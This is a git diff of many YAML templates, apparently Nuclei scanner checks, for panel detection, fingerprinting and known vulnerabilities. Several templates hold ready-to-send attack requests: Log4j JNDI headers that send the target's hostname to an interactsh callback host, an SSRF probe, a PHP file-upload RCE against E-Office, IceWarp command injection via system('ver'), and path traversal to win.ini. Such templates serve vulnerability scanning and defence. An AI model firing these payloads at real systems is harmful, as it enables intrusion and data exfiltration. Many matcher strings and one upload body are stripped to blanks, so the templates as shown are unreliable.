" \ No newline at end of file diff --git a/poc/subdomain_takeover/urge-takeover.yaml b/poc/subdomain_takeover/urge-takeover.yaml index 6cc4e1e8b1..a5fcc3e6f9 100644 --- a/poc/subdomain_takeover/urge-takeover.yaml +++ b/poc/subdomain_takeover/urge-takeover.yaml @@ -3,9 +3,8 @@ info: name: surge takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/webflow-takeover.yaml b/poc/subdomain_takeover/webflow-takeover.yaml index 3fd3180be6..da17c4a95f 100644 --- a/poc/subdomain_takeover/webflow-takeover.yaml +++ b/poc/subdomain_takeover/webflow-takeover.yaml @@ -1,15 +1,18 @@ id: webflow-takeover + info: name: webflow takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - -

The page you are looking for doesn't exist or has been moved.

+ -

The page you are looking for doesn't exist or has been moved.

\ No newline at end of file diff --git a/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml b/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml index cc1d3a4837..2d962b0a96 100644 --- a/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml +++ b/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml @@ -1,11 +1,8 @@ id: pdf-signer-ssti-to-rce - info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high - description: todo - requests: - method: GET path: diff --git a/poc/template_injection/twig-php-ssti.yaml b/poc/template_injection/twig-php-ssti.yaml index f8e8e26d35..d21ecf6b44 100644 --- a/poc/template_injection/twig-php-ssti.yaml +++ b/poc/template_injection/twig-php-ssti.yaml @@ -1,9 +1,10 @@ id: twig-php-ssti + info: name: Twig PHP <2.4.4 template engine - SSTI author: madrobot severity: high - tags: php,ssti + requests: - method: GET path: diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index 4e7ede529c..aa02a4941d 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml @@ -1,29 +1,52 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate - Connection: close + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close + + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryakbyiukl-- + + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' - condition: and + - body_2 == str2 + +# http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/upload/showdoc-file-upload-rce-10226.yaml b/poc/upload/showdoc-file-upload-rce-10226.yaml index 574d070ebd..2cfcddd5ab 100644 --- a/poc/upload/showdoc-file-upload-rce-10226.yaml +++ b/poc/upload/showdoc-file-upload-rce-10226.yaml @@ -1,12 +1,11 @@ id: showdoc-file-upload-rce - info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - reference: https://github.com/star7th/showdoc/pull/1059 + reference: + - https://github.com/star7th/showdoc/pull/1059 tags: rce,fileupload,showdoc - requests: - raw: - | @@ -20,7 +19,6 @@ requests: ----------------------------835846770881083140190633-- - matchers-condition: and matchers: - type: word @@ -28,12 +26,10 @@ requests: - '"url":"http:' - '"success":1' condition: and - - type: status status: - 200 - extractors: - type: json json: - - '.url' \ No newline at end of file + - '.url' diff --git a/poc/upload/zhiyuan-file-upload-11791.yaml b/poc/upload/zhiyuan-file-upload-11791.yaml index 8338a13426..4057d76160 100644 --- a/poc/upload/zhiyuan-file-upload-11791.yaml +++ b/poc/upload/zhiyuan-file-upload-11791.yaml @@ -1,24 +1,33 @@ id: zhiyuan-file-upload + info: - name: Zhiyuan OA arbitrary file upload vulnerability + name: Zhiyuan OA Arbitrary File Upload Vulnerability author: gy741 severity: critical - description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. - reference: https://www.programmersought.com/article/92658169875/ + description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server and cause execute arbitrary code to be executed. + reference: + - https://www.programmersought.com/article/92658169875/ + remediation: Apply the appropriate patch. tags: zhiyuan,rce,upload + requests: - method: GET path: - "{{BaseURL}}/seeyon/thirdpartyController.do.css/..;/ajax.do" + matchers-condition: and matchers: - type: word words: - "java.lang.NullPointerException:null" + - type: word words: - "text/html" part: header + - type: status status: - 200 + +# Enhanced by mp on 2022/02/04 diff --git a/poc/vmware/vmware-horizon-11038.yaml b/poc/vmware/vmware-horizon-11038.yaml index 4627d13031..3c4c7f59a2 100644 --- a/poc/vmware/vmware-horizon-11038.yaml +++ b/poc/vmware/vmware-horizon-11038.yaml @@ -1,21 +1,22 @@ id: vmware-horizon + info: name: VMware Horizon Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6496 tags: panel + requests: - method: GET path: - '{{BaseURL}}/portal/webclient/index.html' - matchers-condition: or + + matchers-condition: and matchers: - type: word - part: body words: - 'VMware Horizon' - - type: regex - part: body - regex: - - '(?m)^Missing route token in request$' + - type: status + status: + - 200 diff --git a/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml b/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml index dc7b93f6b8..d18b8d642c 100644 --- a/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml +++ b/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml @@ -1,43 +1,32 @@ id: vmware-horizon-log4j-jndi-rce - info: name: VMware Horizon Log4j JNDI RCE author: johnk3r - severity: critical - description: | - A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon. + severity: high + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon. reference: - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis - https://www.vmware.com/security/advisories/VMSA-2021-0028.html - - https://logging.apache.org/log4j/2.x/security.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - metadata: - verified: true - shodan-query: http.html:"VMware Horizon" - tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast - + tags: rce,jndi,log4j,horizon,vmware requests: - raw: - | GET /portal/info.jsp HTTP/1.1 Host: {{Hostname}} Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/vmware/vmware-horizon-panel-11035.yaml b/poc/vmware/vmware-horizon-panel-11035.yaml index 596ebf0e7b..e4fda4b734 100644 --- a/poc/vmware/vmware-horizon-panel-11035.yaml +++ b/poc/vmware/vmware-horizon-panel-11035.yaml @@ -4,8 +4,7 @@ info: name: VMware Horizon Login author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/6496 + reference: https://www.exploit-db.com/ghdb/6496 tags: panel,horizon,vmware requests: diff --git a/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml index ef7fc32df9..be1fbe33ea 100644 --- a/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -1,42 +1,38 @@ id: vmware-vcenter-log4j-jndi-rce - info: name: VMware VCenter Log4j JNDI RCE author: _0xf4n9x_ - severity: high - description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter. + severity: critical + description: | + A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter. reference: - - https://twitter.com/tnpitsecurity/status/1469429810216771589 - https://www.vmware.com/security/advisories/VMSA-2021-0028.html - tags: rce,jndi,log4shell,log4j,vcenter - + - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + - https://twitter.com/tnpitsecurity/status/1469429810216771589 + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + metadata: + shodan-query: title:"VMware VCenter" + tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware,oast requests: - raw: - | GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Upgrade-Insecure-Requests: 1 - + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com' # Extract ${hostName} - - matchers-condition: or - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" - - - type: word - part: interactsh_protocol - name: dns - words: - - "dns" + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/vmware/vmware-vcenter-ssrf.yaml b/poc/vmware/vmware-vcenter-ssrf.yaml index 4bd82a9b23..a842c409e1 100644 --- a/poc/vmware/vmware-vcenter-ssrf.yaml +++ b/poc/vmware/vmware-vcenter-ssrf.yaml @@ -1,24 +1,21 @@ id: vmware-vcenter-ssrf - info: name: VMware vCenter SSRF/LFI/XSS author: pdteam severity: critical - reference: https://github.com/l0ggg/VMware_vCenter + reference: + - https://github.com/l0ggg/VMware_vCenter tags: ssrf,lfi,xss,oast,vcenter,vmware - requests: - method: GET path: - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}" - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - - type: status status: - 200 diff --git a/poc/web/axigen-webadmin.yaml b/poc/web/axigen-webadmin.yaml index 0e54704559..515f319cbe 100644 --- a/poc/web/axigen-webadmin.yaml +++ b/poc/web/axigen-webadmin.yaml @@ -7,14 +7,11 @@ info: description: An Axigen Web Admin panel was discovered. reference: - https://www.axigen.com/ - metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' - tags: axigen,panel classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebAdmin" + tags: axigen,panel requests: - method: GET diff --git a/poc/web/azkaban-web-client-676.yaml b/poc/web/azkaban-web-client-676.yaml index e02686810a..c939d27836 100644 --- a/poc/web/azkaban-web-client-676.yaml +++ b/poc/web/azkaban-web-client-676.yaml @@ -4,7 +4,13 @@ info: name: Azkaban Web Client author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + description: An Azkaban web client panel was discovered. + reference: + - https://azkaban.github.io/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Azkaban Web Client" tags: panel,azkaban requests: @@ -20,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/web/cobbler-webgui-1124.yaml b/poc/web/cobbler-webgui-1124.yaml index 00ce480dcc..abd7d4d1bc 100644 --- a/poc/web/cobbler-webgui-1124.yaml +++ b/poc/web/cobbler-webgui-1124.yaml @@ -3,8 +3,8 @@ id: cobbler-webgui info: name: Cobbler WebGUI Detection author: c-sh0 - severity: info description: Detection of Cobbler WebGUI + severity: info metadata: shodan-query: http.title:"Cobbler Web Interface" tags: cobbler,webserver,panel diff --git a/poc/web/dixell-xweb500-filewrite-7020.yaml b/poc/web/dixell-xweb500-filewrite-7020.yaml index 445c9333ac..4fe7c476db 100644 --- a/poc/web/dixell-xweb500-filewrite-7020.yaml +++ b/poc/web/dixell-xweb500-filewrite-7020.yaml @@ -1,17 +1,12 @@ id: dixell-xweb500-filewrite - info: - name: Emerson Dixell XWEB-500 - Arbitrary File Write + name: Dixell XWEB-500 - Arbitrary File Write author: hackerarpan severity: critical - description: Emerson Dixell XWEB-500 products are affected by arbitrary file write vulnerabilities in /cgi-bin/logo_extra_upload.cgi, /cgi-bin/cal_save.cgi, and /cgi-bin/lo_utils.cgi. An attacker will be able to write any file on the target system without any kind of authentication mechanism, and this can lead to denial of service and potentially remote code execution. Note that this product has not been supported since 2018 and should be removed or replaced. - reference: - - https://www.exploit-db.com/exploits/50639 - - https://nvd.nist.gov/vuln/detail/CVE-2021-45420 + reference: https://www.exploit-db.com/exploits/50639 metadata: - google-query: inurl:"xweb500.cgi" - tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive - + google-dork: inurl:"xweb500.cgi" + tags: lfw,iot,dixell,xweb500 requests: - raw: - | @@ -21,20 +16,15 @@ requests: {{randstr}}.txt dixell-xweb500-filewrite - - | GET /logo/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_2, "dixell-xweb500-filewrite")' - - type: status status: - 200 - -# Enhanced by mp on 2022/06/01 diff --git a/poc/web/ewebs-arbitrary-file-reading-7273.yaml b/poc/web/ewebs-arbitrary-file-reading-7273.yaml index f69dddd216..4c913e55aa 100644 --- a/poc/web/ewebs-arbitrary-file-reading-7273.yaml +++ b/poc/web/ewebs-arbitrary-file-reading-7273.yaml @@ -1,4 +1,5 @@ id: ewebs-arbitrary-file-reading + info: name: EWEBS - Local File Inclusion author: pikpikcu @@ -11,13 +12,18 @@ info: cvss-score: 7.5 cwe-id: CWE-22 tags: ewebs,lfi -requests: + metadata: + max-request: 1 + +http: - method: POST path: - '{{BaseURL}}/casmain.xgi' headers: Content-Type: application/x-www-form-urlencoded + body: "Language_S=../../Data/CONFIG/CasDbCnn.dat" + matchers-condition: and matchers: - type: word @@ -26,6 +32,7 @@ requests: - "[LocalInfo]" condition: and part: body + - type: status status: - 200 diff --git a/poc/web/fingerprinthub-web-fingerprints-7480.yaml b/poc/web/fingerprinthub-web-fingerprints-7480.yaml old mode 100755 new mode 100644 index ca2ef4cc89..e9c7fdd205 --- a/poc/web/fingerprinthub-web-fingerprints-7480.yaml +++ b/poc/web/fingerprinthub-web-fingerprints-7480.yaml @@ -2,23 +2,21 @@ id: fingerprinthub-web-fingerprints info: name: FingerprintHub Technology Fingerprint - author: pdteam,righettod + author: pdteam severity: info description: FingerprintHub Technology Fingerprint tests run in nuclei. reference: - https://github.com/0x727/FingerprintHub classification: cwe-id: CWE-200 - metadata: - max-request: 1 tags: tech -http: +requests: - method: GET path: - "{{BaseURL}}" - host-redirects: true + redirects: true max-redirects: 2 matchers-condition: or @@ -717,16 +715,14 @@ http: - axis2-admin - axis2-web - - type: word - name: apache-druid - words: - - content="Apache Druid console" - - type: word part: header name: apache-cocoon + + - type: word + name: apache-druid words: - - "X-Cocoon-Version" + - content="Apache Druid console" - type: word name: apache-flink @@ -791,8 +787,11 @@ http: name: apache-kylin words: - + + - type: word + name: apache-kylin + words: - href="/kylin/" - condition: or - type: word name: apache-mesos @@ -841,13 +840,6 @@ http: words: - "Location: /solr/" - - type: word - part: header - name: apache-dubbo - words: - - 'Www-Authenticate: Basic realm="dubbo"' - case-insensitive: true - - type: word name: apache-struts words: @@ -887,7 +879,7 @@ http: part: header name: apilayer-caddy words: - - "Server: Caddy" + - "Server: caddy" - type: word name: appcms @@ -925,10 +917,10 @@ http: - 管理apusic应用服务器 - type: word - part: server + part: header name: apusic words: - - "Apusic Application Server" + - "Server: apusic application server" - type: word name: arab-portal @@ -1796,7 +1788,8 @@ http: - type: word name: cerberus-helpdesk words: - - + - - type: word name: symantec-endpoint-protection-manager words: - - symantec endpoint protection manager
web access + - symantec endpoint + protection manager
web access - type: word name: symantec-thawte_ssl_cert @@ -12065,7 +12086,8 @@ http: - type: word name: synology-webstation words: - - id="paragraph">web station has been enabled. to finish setting up your website, please see the "web service + - id="paragraph">web station has been enabled. to finish setting up your website, + please see the "web service - type: word name: tab-and-link-manager @@ -12187,7 +12209,8 @@ http: - type: word name: telenor-4g-router words: - - please power off and plug in (u)sim card. then power on again. or pin is permanently blocked, please contact the provider + - please power off and plug in (u)sim card. then power on again. or pin is permanently + blocked, please contact the provider - type: word name: teleradiology-telrads @@ -12753,7 +12776,8 @@ http: - type: word name: turbo-seek words: - - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + mywidth + ",height=" + myheight + + - var myspecs = "'menubar=0,status=1,resizable=1,location=0,titlebar=1,toolbar=1,scrollbars=1,width=" + + mywidth + ",height=" + myheight + - type: word name: turbomail @@ -12839,13 +12863,6 @@ http: words: - welcome to nginx on ubuntu! - - type: word - name: openeuler - words: - - Test Page for the Apache HTTP Server on openEuler Linux - - Test Page for the Nginx HTTP Server on openEuler - condition: or - - type: word name: ucap-search- words: @@ -12931,7 +12948,8 @@ http: - type: word name: ultrastats words: - - + - - type: word name: uniform-server @@ -12946,7 +12964,8 @@ http: - type: word name: uniform-server words: - - + - - type: word name: unimas-cameraaudit @@ -12998,12 +13017,14 @@ http: - type: word name: useresponse words: - - + - title="customer feedback software, community support system" target="_blank" + href="http://www.useresponse.com" class="popup-logo"> - type: word name: useso @@ -13095,7 +13116,8 @@ http: - type: word name: vbulletin words: - - powered by < a href="https://www.vbulletin.com" id="vbulletinlink"> + - powered by < a href="https://www.vbulletin.com" + id="vbulletinlink"> - type: word name: vcalendar @@ -13584,7 +13606,8 @@ http: - type: word name: web-data-administrator words: - - shopping cart software' + - 'powered by webasyst shop-script shopping cart software' - type: word name: webbased-pear-package-manager @@ -13674,7 +13698,8 @@ http: - type: word name: webissues words: - -
+ -
- type: word name: weblogic @@ -13815,12 +13840,14 @@ http: - type: word name: whatweb words: - -
+ -
troy serial server
- type: word name: whatweb words: - - network card access password: + - network card access password: - type: word name: whfst-cms @@ -13860,7 +13887,8 @@ http: - type: word name: whmcs words: - -
please login or register
+ -
please login + or register
- type: word name: whtzjkj-erp @@ -14347,6 +14375,13 @@ http: words: - 神盾fs3文档安全共享系统v2.0 + - type: word + condition: and + name: yapi + words: + - YApi + - 可视化接口管理平台 + - type: word name: yearning words: @@ -14360,7 +14395,8 @@ http: - type: word name: yelala words: - - '' + - '' - type: word name: yfidea-oa @@ -14635,7 +14671,8 @@ http: - type: word name: yunanbao-yunxz words: - - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"' + - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: + 0px"' - type: word name: yuneasy-ipcalling @@ -14940,7 +14977,8 @@ http: - type: word name: zkteco-security-management-system words: - - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved"); + - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. + all rights reserved"); - type: word name: zkteco-system @@ -15018,7 +15056,8 @@ http: - type: word name: zxoa words: - - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" /> + - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" + class="loginbtn" /> - type: word name: zzcms @@ -15035,34 +15074,4 @@ http: words: - Powered by ZZZcms - - type: word - name: bitwarden - words: - - Bitwarden Web Vault - - - type: word - name: OpenBSD relayd - part: header - words: - - "Server: OpenBSD httpd" - - - type: word - name: Hunchentoot - part: header - words: - - "Server: Hunchentoot" - - - type: word - name: weblate - words: - - Weblate - - - condition: and - - - type: word - name: Adobe Experience Manager (AEM) - part: header - words: - - "x-dispatcher:" - case-insensitive: true -# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by cs on 2022/02/08 diff --git a/poc/web/geovision-geowebserver-lfi-7595.yaml b/poc/web/geovision-geowebserver-lfi-7595.yaml index 6f8dc53b3e..c0e7dbfcad 100644 --- a/poc/web/geovision-geowebserver-lfi-7595.yaml +++ b/poc/web/geovision-geowebserver-lfi-7595.yaml @@ -1,19 +1,22 @@ id: geowebserver-lfi + info: name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: - - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi + requests: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" - "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa" + matchers-condition: and matchers: + - type: word words: - "bit app support" @@ -21,6 +24,7 @@ requests: - "extensions" condition: and part: body + - type: status status: - 200 diff --git a/poc/web/icewarp-webclient-rce-8129.yaml b/poc/web/icewarp-webclient-rce-8129.yaml index caa8758541..a7494e8328 100644 --- a/poc/web/icewarp-webclient-rce-8129.yaml +++ b/poc/web/icewarp-webclient-rce-8129.yaml @@ -1,12 +1,11 @@ id: icewarp-webclient-rce - info: name: IceWarp WebClient RCE author: gy741 severity: critical + reference: + - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: icewarp,rce - reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E - requests: - raw: - | @@ -15,14 +14,12 @@ requests: Content-Type: application/x-www-form-urlencoded _dlg[captcha][target]=system(\'ver\')\ - matchers-condition: and matchers: - type: word words: - "Microsoft Windows [Version" part: body - - type: status status: - 302 diff --git a/poc/web/iplanet-web-server-8190.yaml b/poc/web/iplanet-web-server-8190.yaml index e496eac963..78c1d984a9 100644 --- a/poc/web/iplanet-web-server-8190.yaml +++ b/poc/web/iplanet-web-server-8190.yaml @@ -1,28 +1,21 @@ id: iplanet-web-server - info: name: Detect iPlanet Webserver Detection author: pussycat0x severity: info metadata: - max-request: 1 fofa-query: app="iPlanet-Web-Server,-Enterprise-Edition-4.1" tags: tech,webserver - -http: +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word part: body words: - "iPlanet" - - type: status status: - 200 - -# digest: 4a0a0047304502210085231abeb2eece3463a8001f3a5b066c5f5f30aa5823fbf2eb4b10520b79fb0702201d87c5ced6a65a59d948f624dbd2977a123af662c5f4cd755b61b60663cf4f53:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/keenetic-web-login-8442.yaml b/poc/web/keenetic-web-login-8442.yaml index ad827f8f73..bc9aba324b 100644 --- a/poc/web/keenetic-web-login-8442.yaml +++ b/poc/web/keenetic-web-login-8442.yaml @@ -1,15 +1,17 @@ id: keenetic-web-login + info: name: Keenetic Web Login author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/6817 + reference: https://www.exploit-db.com/ghdb/6817 tags: panel,keenetic + requests: - method: GET path: - '{{BaseURL}}/login#goto=%2Fdashboard' + matchers-condition: and matchers: - type: word diff --git a/poc/web/microsoft-teams-webhook.yaml b/poc/web/microsoft-teams-webhook.yaml index 8e6497e83d..a96a661eb0 100644 --- a/poc/web/microsoft-teams-webhook.yaml +++ b/poc/web/microsoft-teams-webhook.yaml @@ -3,7 +3,7 @@ info: name: Microsoft Teams Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,microsoft requests: - method: GET path: diff --git a/poc/web/microweber-xss-8865.yaml b/poc/web/microweber-xss-8865.yaml index e3b0bb3e84..70c7e8a91c 100644 --- a/poc/web/microweber-xss-8865.yaml +++ b/poc/web/microweber-xss-8865.yaml @@ -3,16 +3,17 @@ info: name: Microweber Cross-Site Scripting author: gy741 severity: high - description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber. + description: "Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber." reference: - https://github.com/microweber/microweber/issues/809 - https://github.com/microweber/microweber + metadata: + shodan-query: 'http.favicon.hash:780351152' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 + cve-id: cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:780351152 tags: microweber,xss,oss requests: - method: GET diff --git a/poc/web/oracle-iplanet-web-server-9393.yaml b/poc/web/oracle-iplanet-web-server-9393.yaml index 8bd76eabb4..dcf6b13bc8 100644 --- a/poc/web/oracle-iplanet-web-server-9393.yaml +++ b/poc/web/oracle-iplanet-web-server-9393.yaml @@ -1,21 +1,26 @@ id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server tags: tech,oracle + metadata: + fofa-query: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - "Oracle iPlanet Web Server" + - type: status status: - 200 diff --git a/poc/web/saia-web-server-info-9980.yaml b/poc/web/saia-web-server-info-9980.yaml index 91bf6d9d5b..36354a771d 100644 --- a/poc/web/saia-web-server-info-9980.yaml +++ b/poc/web/saia-web-server-info-9980.yaml @@ -1,24 +1,21 @@ id: saia-web-server - info: name: Saia PCD Web-Server author: DhiyaneshDk severity: low - reference: https://www.exploit-db.com/ghdb/6865 + reference: + - https://www.exploit-db.com/ghdb/6865 tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/loadtextfile.htm#programinfo" - matchers-condition: and matchers: - type: word words: - "Saia PCD Web Server" part: body - - type: status status: - 200 diff --git a/poc/web/total-web-10816.yaml b/poc/web/total-web-10816.yaml index ba8a8510dc..8bd260cf04 100644 --- a/poc/web/total-web-10816.yaml +++ b/poc/web/total-web-10816.yaml @@ -1,17 +1,14 @@ id: total-web-login - info: name: Total Web Solution author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 tags: panel - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word diff --git a/poc/web/web-config-11126.yaml b/poc/web/web-config-11126.yaml index 68df3b091a..7c1e1b7f62 100644 --- a/poc/web/web-config-11126.yaml +++ b/poc/web/web-config-11126.yaml @@ -1,159 +1,15 @@ id: web-config + info: name: Web Config file - author: nullenc0de - severity: medium + author: Yash Anand @yashanand155 + severity: info tags: config,exposure requests: - method: 